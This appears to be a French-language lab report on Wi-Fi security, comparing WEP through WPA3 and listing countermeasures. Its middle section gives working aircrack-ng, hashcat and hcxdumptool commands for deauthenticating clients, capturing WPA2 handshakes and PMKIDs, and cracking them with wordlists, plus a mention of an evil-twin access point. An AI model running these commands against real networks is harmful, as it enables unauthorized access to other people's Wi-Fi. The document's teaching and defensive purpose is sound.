⚠️ Avertissement légal : Ce projet est réalisé dans un environnement de laboratoire contrôlé à des fins strictement pédagogiques.
Étude technique sur l'exploitation et la sécurisation des réseaux IEEE 802.11. Ce rapport couvre les protocoles de sécurité Wi-Fi, les techniques d'attaque courantes et les contre-mesures à mettre en place.
| Protocole | Sécurité | Vulnérabilités |
|---|---|---|
| WEP | Très faible | RC4 cassable en < 5 min |
| WPA | Faible | TKIP vulnérable, KRACK |
| WPA2 | Moyen | Attaques dictionnaire sur handshake |
| WPA3 | Fort | SAE résiste au brute-force offline |
Le handshake 4-way est la cible principale des attaques sur WPA2-Personal.
# 1. Passer en mode moniteur
airmon-ng start wlan0
# 2. Scanner les réseaux environnants
airodump-ng wlan0mon
# 3. Capturer le handshake (attendre ou forcer une déauth)
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# 4. Forcer la reconnexion d'un client
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon# Crack du handshake capturé avec une wordlist
aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt
# Alternative avec hashcat (GPU)
hashcat -m 22000 capture.hccapx wordlist.txtCréation d'un AP clone pour intercepter les connexions via hostapd + dnsmasq.
# Capture du PMKID sans attendre un client
hcxdumptool -i wlan0mon --enable_status=3 -o capture.pcapng
# Conversion et crack
hcxpcapngtool -o hash.hc22000 capture.pcapng
hashcat -m 22000 hash.hc22000 wordlist.txt| Mesure | Description |
|---|---|
| WPA3 Enterprise | Authentification 802.1X + certificats |
| Mots de passe forts | +20 caractères aléatoires |
| WIDS/WIPS | Détection d'APs non autorisés |
| Segmentation VLAN | Isolation du réseau Wi-Fi invité |
| VPN obligatoire | Chiffrement applicatif en complément |
La sécurité Wi-Fi repose avant tout sur le choix du protocole (WPA3 recommandé), la robustesse des mots de passe et la surveillance active du réseau. WPA2 reste exploitable via des attaques dictionnaire si la passphrase est faible.